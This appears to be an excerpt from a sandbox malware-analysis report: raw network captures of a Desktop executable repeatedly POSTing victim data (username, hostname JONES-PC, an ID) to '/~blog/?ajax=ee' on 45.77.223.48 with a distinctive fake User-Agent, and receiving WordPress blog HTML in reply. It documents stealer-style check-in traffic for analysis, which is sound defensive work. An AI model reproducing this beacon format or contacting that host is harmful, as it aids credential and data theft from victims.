                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:42:12.161608934 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:42:12.161775112 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              12192.168.2.44976145.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:42:12.423264980 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:42:12.554119110 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:42:13.559456110 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:42:12 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:42:13.559639931 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:42:13.559693098 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:42:13.574517012 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:42:13.575109959 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:42:13.575181007 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:42:13.575377941 CEST1289INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0
                                              Apr 25, 2024 09:42:13.575388908 CEST1289INData Raw: 22 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 34 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 32 30 30 62 5c 75 64 62 34 30 5c
                                              Data Ascii: ","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undef
                                              Apr 25, 2024 09:42:13.575438023 CEST1289INData Raw: 53 74 72 69 6e 67 28 29 5d 2e 6a 6f 69 6e 28 22 2c 22 29 2b 22 29 29 3b 22 2c 72 3d 6e 65 77 20 42 6c 6f 62 28 5b 65 5d 2c 7b 74 79 70 65 3a 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 7d 29 2c 61 3d 6e 65 77 20 57 6f 72 6b 65 72 28 55 52
                                              Data Ascii: String()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(funct
                                              Apr 25, 2024 09:42:13.575459003 CEST1289INData Raw: 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 20 73 76 67 7b 68 65 69 67 68 74 3a 31 65 6d 3b 77 69 64 74 68 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 73 6f 63 69 61
                                              Data Ascii: al-links .wp-social-link svg{height:1em;width:1em}.wp-block-social-links .wp-social-link span:not(.screen-reader-text){font-size:.65em;margin-left:.5em;margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-socia


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              13192.168.2.44976245.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:42:13.826992989 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:42:13.957707882 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:42:14.795881033 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:42:13 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:42:14.796097040 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:42:14.796113014 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:42:14.805701017 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:42:14.806463957 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:42:14.806490898 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:42:14.806750059 CEST1289INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0
                                              Apr 25, 2024 09:42:14.806762934 CEST1289INData Raw: 22 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 34 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 32 30 30 62 5c 75 64 62 34 30 5c
                                              Data Ascii: ","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undef
                                              Apr 25, 2024 09:42:14.806868076 CEST1289INData Raw: 53 74 72 69 6e 67 28 29 5d 2e 6a 6f 69 6e 28 22 2c 22 29 2b 22 29 29 3b 22 2c 72 3d 6e 65 77 20 42 6c 6f 62 28 5b 65 5d 2c 7b 74 79 70 65 3a 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 7d 29 2c 61 3d 6e 65 77 20 57 6f 72 6b 65 72 28 55 52
                                              Data Ascii: String()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(funct
                                              Apr 25, 2024 09:42:14.806921959 CEST1289INData Raw: 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 20 73 76 67 7b 68 65 69 67 68 74 3a 31 65 6d 3b 77 69 64 74 68 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 73 6f 63 69 61
                                              Data Ascii: al-links .wp-social-link svg{height:1em;width:1em}.wp-block-social-links .wp-social-link span:not(.screen-reader-text){font-size:.65em;margin-left:.5em;margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-socia


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              14192.168.2.44976345.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:42:15.058675051 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:42:15.188554049 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:42:16.026596069 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:42:15 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:42:16.026631117 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:42:16.026647091 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:42:16.035516977 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:42:16.035778046 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:42:16.036103964 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:42:16.036222935 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:42:16.036348104 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:42:16.036387920 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:42:16.036433935 CEST670INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              15192.168.2.44976445.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:42:16.290446043 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:42:16.416588068 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:42:17.244680882 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:42:16 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:42:17.244985104 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:42:17.244997025 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:42:17.255544901 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:42:17.255914927 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:42:17.256104946 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:42:17.256175041 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:42:17.256627083 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:42:17.256705999 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:42:17.256825924 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              16192.168.2.44976545.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:42:17.524611950 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:42:17.650319099 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:42:18.466468096 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:42:17 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:42:18.466639042 CEST22INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20
                                              Data Ascii: <!DOCTYPE html><html
                                              Apr 25, 2024 09:42:18.466790915 CEST12INData Raw: 6c 61 6e 67 3d 22 65 6e 2d 55 53 22
                                              Data Ascii: lang="en-US"
                                              Apr 25, 2024 09:42:18.466859102 CEST25INData Raw: 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: ><head><meta charset="
